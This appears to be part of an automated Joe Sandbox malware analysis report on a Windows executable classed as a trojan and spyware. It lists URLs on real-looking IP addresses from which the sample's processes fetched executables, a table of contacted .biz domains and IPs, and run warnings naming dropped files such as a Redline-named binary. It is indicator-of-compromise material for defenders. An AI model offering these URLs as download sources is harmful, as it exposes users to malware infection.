                                                                                                                                                                                                                                                                                                                                                http://208.100.26.245/xalg.exe, 00000005.00000003.2609540931.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                  http://172.234.222.138/vfgrjxuhtsfioalg.exe, 00000005.00000003.2462444429.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                    http://tempuri.org/Entity/Id14LRbuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                      http://tempuri.org/Entity/Id6LRbuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressingbuild.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                          http://34.211.97.45/cgfpujhdoalg.exe, 00000005.00000003.2773708349.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2756072991.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                            http://172.234.222.138/qntnralg.exe, 00000005.00000003.2453136233.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                              http://tempuri.org/Entity/Id5Responsebuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                http://18.208.156.248/hbbreaeoihjkoswalg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                  http://82.112.184.197/dltqfingsalg.exe, 00000005.00000003.2371520323.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                    http://tempuri.org/Entity/Id11ResponsehDbuild.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                      http://tempuri.org/Entity/Id10Responsebuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                        http://tempuri.org/Entity/Id8Responsebuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                          http://208.100.26.245:80/ywcfdqaloklmslqoalg.exe, 00000005.00000003.2499966144.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2498837288.00000000004A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                            http://tempuri.org/Entity/Id22LRbuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                              http://44.221.84.105/snxddmvolovsghkalg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000002.3335222393.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3198048536.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3283417082.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3274901650.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3184983219.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305228231.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305846677.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3241193909.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3285380290.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3264636992.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3238419493.00000000004D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                http://172.234.222.138:80/qntnralg.exe, 00000005.00000003.2447576365.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2448344378.00000000004AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                  http://54.244.188.177/exvjfnyxjxwqXwLalg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                    http://13.251.16.150/ghraajhdoalg.exe, 00000005.00000003.2744437728.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2727806558.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                      http://208.100.26.245/gs#alg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                        http://208.100.26.245/Falg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                          http://tempuri.org/Entity/Id15ResponsehDbuild.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                            http://208.100.26.245/Oalg.exe, 00000005.00000003.2500172855.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                              http://44.221.84.105/ngsalg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2181861289.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2181313239.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2420996108.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                http://34.246.200.160:80/qowwyqvurlxrxabkalg.exe, 00000005.00000003.2939549451.00000000004AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                  http://208.100.26.245/7alg.exe, 00000005.00000003.2609540931.000000000046C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                    http://tempuri.org/Entity/Id7LRbuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                      http://tempuri.org/Entity/Id11LRbuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                        http://tempuri.org/Entity/Id13Responsebuild.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                          http://tempuri.org/Entity/Id22ResponsehDbuild.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                            http://tempuri.org/Entity/Id4ResponsehDbuild.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                                                                                                              165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              		myups.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		19574CSCUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                              3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              		uaafd.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                              3.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              		ytctnunms.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                              34.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              		tbjrpv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                              172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                              		przvgke.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                                                                                                                              18.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              		damcprvgv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                                                                                                                                                                              34.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              		vrrazpdh.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                              208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              		gytujflc.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		32748STEADFASTUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                              35.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              		nqwjmb.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                              172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                              		fwiwk.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		20940AKAMAI-ASN1EUtrue
                                                                                                                                                                                                                                                                                                                                                                                                              165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                              		unknownUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		19574CSCUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                              51.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              		s82.gocheapweb.comFrance
                                                                                                                                                                                                                                                                                                                                                                                                              		16276OVHFRfalse
                                                                                                                                                                                                                                                                                                                                                                                                              212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              		unknownNetherlands
                                                                                                                                                                                                                                                                                                                                                                                                              		64236UNREAL-SERVERSUStrue
                                                                                                                                                                                                                                                                                                                                                                                                              72.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                              		wxgzshna.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                              44.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              		hehckyov.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                              85.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              		dlynankz.bizGermany
                                                                                                                                                                                                                                                                                                                                                                                                              		6724STRATOSTRATOAGDEfalse
                                                                                                                                                                                                                                                                                                                                                                                                              54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              		pywolwnvd.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                              13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              		sxmiywsfv.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                              47.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              		xlfhhhm.bizCanada
                                                                                                                                                                                                                                                                                                                                                                                                              		34533ESAMARA-ASRUfalse
                                                                                                                                                                                                                                                                                                                                                                                                              18.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              		vyome.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                              82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                              		vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                                                                                                                                                                              		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                                                                                                                                                                                                                                                              18.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              		warkcdu.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                              172.67.74.152
                                                                                                                                                                                                                                                                                                                                                                                                              		api.ipify.orgUnited States
                                                                                                                                                                                                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                                                                                                              Analysis ID:1549472
                                                                                                                                                                                                                                                                                                                                                                                                              Start date and time:2024-11-05 17:01:49 +01:00
                                                                                                                                                                                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                                                                                                              Overall analysis duration:0h 14m 4s
                                                                                                                                                                                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                                                                                              Number of analysed new started processes analysed:42
                                                                                                                                                                                                                                                                                                                                                                                                              Number of new started drivers analysed:3
                                                                                                                                                                                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                                                                                              Sample name:AENiBH7X1q.exe
                                                                                                                                                                                                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                                                                                                                                                                                                              Original Sample Name:78897e2d5b18ff4a71db6703ec5781abedff5794bd79fcee70babd7b0622eef8.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                                                                                                                                                                                              Classification:mal100.spre.troj.spyw.expl.evad.winEXE@45/170@173/23
                                                                                                                                                                                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                                                                                                                                                                                              • Successful, ratio: 69.2%
                                                                                                                                                                                                                                                                                                                                                                                                              HCA Information:Failed
                                                                                                                                                                                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                                                                                                                                                                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe, VSSVC.exe, WmiApSrv.exe, SearchIndexer.exe, svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                              • Execution Graph export aborted for target Native_Redline_BTC.exe, PID 1900 because it is empty
                                                                                                                                                                                                                                                                                                                                                                                                              • Execution Graph export aborted for target TrojanAIbot.exe, PID 5628 because it is empty
                                                                                                                                                                                                                                                                                                                                                                                                              • Execution Graph export aborted for target microsofts.exe, PID 1816 because there are no executed function
                                                                                                                                                                                                                                                                                                                                                                                                              • Execution Graph export aborted for target server_BTC.exe, PID 1352 because it is empty
                                                                                                                                                                                                                                                                                                                                                                                                              • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
